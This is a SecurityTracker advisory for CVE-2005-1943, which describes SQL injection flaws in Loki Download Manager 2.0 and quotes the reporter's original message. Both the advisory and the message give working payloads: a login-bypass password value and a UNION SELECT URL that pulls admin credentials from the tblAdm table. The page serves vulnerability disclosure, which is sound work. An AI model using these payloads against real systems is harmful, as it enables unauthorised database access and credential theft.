SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   Loki Download Manager Vendors:   Loki Download Manager
Loki Download Manager Input Validation Holes Permit SQL Injection Attacks
SecurityTracker Alert ID:  1014147
SecurityTracker URL:  http://securitytracker.com/id/1014147
CVE Reference:   CVE-2005-1943   (Links to External Site)
Updated:  Nov 2 2008
Original Entry Date:  Jun 9 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, User access via network
Exploit Included:  Yes  
Version(s): 2.0
Description:   Salmanooh reported a vulnerability in Loki Download Manager. A remote user can inject SQL commands.

The '/adm/default.asp' script does not properly validate user-supplied input in the 'password' parameter. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.

Some demonstration exploit values are provided:

user: anyuser
pass: 'or''='

The 'cat' parameter in the 'catinfo.asp' script is also affected. A demonstration exploit value to retrieve password information is provided:

http://[target]/downmancv/catinfo.asp?cat=' union select
null,null,user,null,null,null,null,null,pass,null,null,null,null,null FROM
tblAdm '

Impact:   A remote user can execute SQL commands on the underlying database. This can be exploited to retrieve authentication data.
Solution:   No solution was available at the time of this entry.

[Editor's note: The vendor's web site is no longer in operation.]

Cause:   Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  2 SQL injection in Loki download manager v2.0


hi

2 SQL injection in Loki download manager v2.0

1. in http://localhost/adm/default.asp

user: anyuser
pass: 'or''='

2. in http://localhost/downmancv/catinfo.asp?cat=' union select 
null,null,user,null,null,null,null,null,pass,null,null,null,null,null FROM 
tblAdm '

and u will have user and pass h4ve F4n

Salmanooh

hack_912@hotmail.com

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE! 
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC